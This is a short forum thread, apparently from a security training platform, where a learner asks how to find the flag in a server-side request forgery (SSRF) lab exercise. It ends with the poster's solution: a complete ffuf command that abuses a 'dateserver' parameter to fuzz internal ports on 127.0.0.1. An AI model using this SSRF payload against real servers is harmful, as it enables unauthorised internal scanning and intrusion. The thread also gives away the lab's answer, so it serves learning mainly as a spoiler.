Help Needed with Identifying SSRF Flag Location

Rahaf20 · October 27, 2024, 3:48pm

Hello everyone, I hope you’re all doing great!

I’m working on an Identifying SSRF exercise and have successfully identified an open port (80) using fuzzing, so everything is progressing well so far. However, I’m having trouble locating the flag. I tried accessing http://127.0.0.1:80/flag.txt, but I receive a “404 Not Found” response.

Does anyone have any hints on where I might find the flag or how I should proceed from here?

Thank you in advance for any guidance!

rootshree · October 27, 2024, 4:52pm

Try finding using /user.txt

Rahaf20 · October 27, 2024, 5:50pm

sadly it didn’t work, but thank you for helping!

Rahaf20 · October 30, 2024, 6:04pm

The problem solved !

Steps:

Fuzzing Ports:
Use the following ffuf command to fuzz the ports:
ffuf -w ports.txt -u http://10.129.94.22/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect"
Finding the Flag:
You’ll get responses for three ports. Try connecting to each of them to locate the flag.

Topic		Replies	Views
Server-side attacks / Exploiting SSRF section about Gopherus Academy academy	7	393	October 16, 2024
HTB Academy - Server-side Attacks Blind SSRF Academy noob , server-side-attack , academy	3	93	October 9, 2024
Server-side Attacks Blind SSRF port scanning Academy	1	131	August 13, 2024
SSRF Exploitation Example: Extra Flag? Academy	0	348	February 2, 2023
Attacking web applications with ffuf Academy help	8	2286	April 6, 2024

Help Needed with Identifying SSRF Flag Location

Related topics